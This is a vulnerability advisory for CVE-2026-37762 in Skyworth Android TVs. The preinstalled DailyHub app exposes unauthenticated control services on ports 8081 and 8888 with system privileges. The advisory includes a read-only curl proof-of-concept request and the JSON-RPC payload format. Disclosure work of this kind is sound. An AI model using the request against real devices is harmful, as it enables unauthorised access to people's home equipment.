Summary
| Field | Value |
|---|---|
| CVE ID | CVE-2026-37762 |
| Vulnerability Type | Missing Authentication / Insecure Permissions |
| CWE | CWE-306, CWE-732 |
| Attack Vector | Network (Adjacent) |
| CVSS v3.1 Base Score | 8.8 (High) |
| CVSS v3.1 Vector | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Assigned By | MITRE |
| Status | Published |
| Discovered By | Mohammed Alzahrani |
Affected Products
| Field | Value |
|---|---|
| Device | Skyworth SW-22AE NF (MediaTek m7332 platform) |
| Firmware Build | SW/SW6H_TG_NF/SW6H:11/RTT2.220103.001/20250701:user/release-keys |
| Android Version | 11 |
| Security Patch | 2025-06-01 |
| Vulnerable App | com.smartdevice.dailyshortcut (DailyHub) |
| App Version | 1.0.268.250721 (versionCode 1000268) |
| System UID | userId=1000 |
| Code Path | /system_ext/app/DailyHub |
Description
The DailyHub system application (com.smartdevice.dailyshortcut), pre-installed on Skyworth Android TV devices, exposes two unauthenticated network services:
- HTTP server on TCP port 8081 — via NanoHTTPD, accepting JSON-RPC style POST requests
- Plaintext TCP control service on port 8888 — accepting raw control commands
Both services require no authentication, pairing, or authorization of any kind.
Affected components:
com.smartdevice.dailyshortcutcom.smartdevice.ipcontrol.SddpServicecom.smartdevice.ipcontrol.IPControlServicecom.smartdevice.ipcontrol.server.IPControlServer(NanoHTTPD on port 8081)com.smartdevice.ipcontrol.processor.SystemRequestProcessor(/system)
A network-adjacent attacker (same Wi-Fi or LAN segment) can send crafted HTTP POST requests to http://<TV_IP>:8081/* with JSON payloads of the form:
{"method": "<method_name>", "params": [...]}
Because the application runs as a system app with userId=1000, successful exploitation provides access to privileged system-level operations.
Impact
- Remote Command Execution — Arbitrary system methods can be invoked via the unauthenticated HTTP API
- Privilege Escalation — System-level access (
userId=1000) granted to unauthenticated network attacker - Information Disclosure — Device configuration, internal state, and system information exposed
- Denial of Service — Device can be disrupted or rendered unresponsive via crafted requests
Proof of Concept (Safe, Non-Destructive)
The following request retrieves system information without any credentials:
curl -s -X POST 'http://<TV_IP>:8081/system' \
-H 'Content-Type: application/json' \
--data '{"method":"getSystemInformation","params":[]}'
Replace <TV_IP> with the target device’s IP address on the local network. No token, PIN, or pairing required.
This PoC is non-destructive and only reads device information. It demonstrates that the HTTP API is fully unauthenticated.
Remediation
For users:
- Isolate smart TV devices on a dedicated VLAN or IoT network segment
- Apply firmware updates from Skyworth when available
- Monitor for unexpected outbound connections from TV devices
For the vendor:
- Implement authentication and authorization for all exposed network services
- Disable unauthenticated access to system-level methods
- Bind services to localhost unless explicit user consent is obtained
- Require pairing/PIN before accepting remote commands
Disclosure Timeline
| Date | Event |
|---|---|
| 2026 | Vulnerability discovered |
| 2026 | Reported to vendor |
| 2026 | Vendor acknowledged |
| 2026-06-28 | CVE-2026-37762 assigned by MITRE |
References
Discovered by Mohammed Alzahrani